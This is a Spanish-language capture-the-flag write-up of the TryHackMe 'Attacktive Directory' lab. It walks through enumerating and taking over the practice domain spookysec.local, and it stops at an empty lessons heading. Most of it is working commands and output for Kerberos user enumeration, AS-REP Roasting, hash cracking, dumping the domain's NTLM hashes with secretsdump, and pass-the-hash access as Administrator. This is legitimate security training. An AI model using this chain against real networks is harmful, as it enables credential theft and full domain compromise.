TryHackMe Medium Windows Active Directory Kerberos

Attacktive Directory

Enumeración y ataque a un entorno Active Directory. Kerberoasting, AS-REP Roasting y Pass-the-Hash contra el dominio spookysec.local.

Jul 2022 ~90 min cat4clysm
Herramientas utilizadas
nmap kerbrute impacket hashcat evil-winrm secretsdump

Reconocimiento

Escaneo de puertos revela un entorno Windows AD completo con Kerberos, LDAP, SMB y RDP.

root@kali:~$
nmap -sC -sV -p53,80,88,135,139,389,445,3268,3389,5985 -Pn 10.10.241.225
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: spookysec.local)
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI (WinRM)

Enumeramos usuarios del dominio con Kerbrute:

root@kali:~$
kerbrute userenum --dc 10.10.241.225 -d spookysec.local userlist.txt
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]

AS-REP Roasting

Buscamos cuentas con DONT_REQUIRE_PREAUTH para obtener hashes sin autenticación.

root@kali:~$
python3 GetNPUsers.py spookysec.local/ -usersfile valid_users.txt -dc-ip 10.10.241.225 -no-pass
[email protected]:hash...

Crackeamos el hash con hashcat:

root@kali:~$
hashcat -m 18200 hash.txt passwordlist.txt --force
[email protected]:...:management2005

Escalada — Secretsdump & Pass-the-Hash

Con las credenciales de svc-admin dumpeamos los hashes NTLM de todo el dominio:

root@kali:~$
python3 secretsdump.py -just-dc spookysec.local/svc-admin:[email protected]
Administrator:500:aad3b435b51404eeaad3b435b51404ee:hash_ntlm:::

Pass-the-Hash con Evil-WinRM:

root@kali:~$
evil-winrm -i 10.10.241.225 -u Administrator -H <NTLM_HASH>
Evil-WinRM shell v3.4
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
thm-ad\administrator

Lecciones aprendidas